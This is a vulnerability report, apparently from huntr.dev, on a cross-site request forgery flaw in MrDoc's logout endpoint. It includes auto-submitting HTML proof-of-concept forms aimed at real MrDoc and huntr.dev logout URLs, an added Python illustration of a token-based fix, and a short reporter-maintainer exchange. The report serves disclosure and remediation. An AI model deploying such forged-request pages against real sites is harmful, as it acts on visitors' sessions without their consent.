Cross-Site Request Forgery (CSRF) in zmister2016/mrdoc
Reported on Nov 23rd 2021
Description
An attacker is able to log out a user if a logged-in user visits the attacker's website.
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://mrdoc.zmister.com/logout/">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
This vulnerability allows an attacker to force users to log out unintentionally.
More details
One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.
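The fix recommended above (a POST-only logout protected by a CSRF token) in working form. This is an added illustration, not MrDoc's own logout view: it uses constructed, framework-free Session and Request stand-ins, a placeholder SITE_ORIGIN, and a hypothetical csrf_token form field. It models the report's PoC, whose form has no method attribute and therefore submits via GET, against both the vulnerable handler and the hardened one, and also shows why an auto-submitted POST from an attacker's page still fails: the attacker's page cannot read the victim's session token. In a Django application such as MrDoc the same effect comes from the CSRF middleware together with the require_POST decorator.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Constructed, framework-free stand-ins for a server-side session and an HTTP
# request. Illustration code only; not MrDoc's logout view.


@dataclass
class Session:
    user: Optional[str] = None
    # Per-session synchronizer token, issued when the session is created.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    session: Session
    form: dict = field(default_factory=dict)
    # Browsers attach an Origin header to cross-site POST form submissions.
    origin: Optional[str] = None


# Assumed origin of the site itself (placeholder, not a real deployment).
SITE_ORIGIN = "https://app.example"


def logout_vulnerable(request: Request) -> int:
    """Logout bound to a bare GET: any cross-site <form>, <img src=...> or link
    pointing at the URL logs the visitor out. Mirrors the reported behaviour."""
    request.session.user = None
    return 302


def logout_hardened(request: Request) -> int:
    """Logout that only honours a same-origin POST carrying the session's token."""
    if request.method != "POST":
        return 405  # GET and HEAD never change state
    if request.origin is not None and request.origin != SITE_ORIGIN:
        return 403  # cross-site form post, rejected before the token is checked
    submitted = request.form.get("csrf_token", "")
    # Constant-time comparison of the submitted token with the session's token.
    if not hmac.compare_digest(submitted, request.session.csrf_token):
        return 403
    request.session.user = None
    return 302


def forged_get(handler) -> tuple:
    """Model of the report's PoC: a <form> with no method attribute submits via
    GET from the attacker's page while the victim is logged in. Browsers send
    no Origin header on a plain GET navigation."""
    sess = Session(user="alice")
    req = Request(method="GET", session=sess)
    return handler(req), sess.user


def forged_post(handler) -> tuple:
    """Same attacker page, but auto-submitting a POST form. The page cannot read
    the victim's session token, so the form carries none."""
    sess = Session(user="alice")
    req = Request(method="POST", session=sess, form={}, origin="https://attacker.example")
    return handler(req), sess.user


def genuine_post(handler) -> tuple:
    """The site's own logout button: same-origin POST with the token that the
    server rendered into the form."""
    sess = Session(user="alice")
    req = Request(method="POST", session=sess,
                  form={"csrf_token": sess.csrf_token}, origin=SITE_ORIGIN)
    return handler(req), sess.user


if __name__ == "__main__":
    print("forged GET   vs vulnerable:", forged_get(logout_vulnerable))   # (302, None)
    print("forged GET   vs hardened:  ", forged_get(logout_hardened))     # (405, 'alice')
    print("forged POST  vs hardened:  ", forged_post(logout_hardened))    # (403, 'alice')
    print("genuine POST vs hardened:  ", genuine_post(logout_hardened))   # (302, None)
```

The status codes show the two layers of the defence: the method check alone stops the image-tag and GET-form variants described above, and the token check (with the Origin comparison as a second line) stops a cross-site POST even though the attacker's page can auto-submit one.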
Note
While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.
Although after clicking on the PoC.html, the server HTTP response code is 500 with a message: Server Error (500). However, when reloading the homepage, you can see that the user has been logged out successfully.
According to the test, huntr.dev also has this problem. Example:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://huntr.dev/auth/logout/">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
So ……
Yes, I agree with you.
As noted in the description. "While this cannot harm a user's account it can be a great annoyance and is a valid CSRF."
Looking at some other reports on the same vulnerability, this is a simple fix. Either way, no disrespect if you disagree, but it is valid. You will see that Laravel itself now uses a POST request for logout and not GET.
Thanks for your response. It does not matter. It is up to you to decide whether to validate the report or not. I won't be upset. 🤗
But it's better to change it to a POST request. Thank you for your feedback.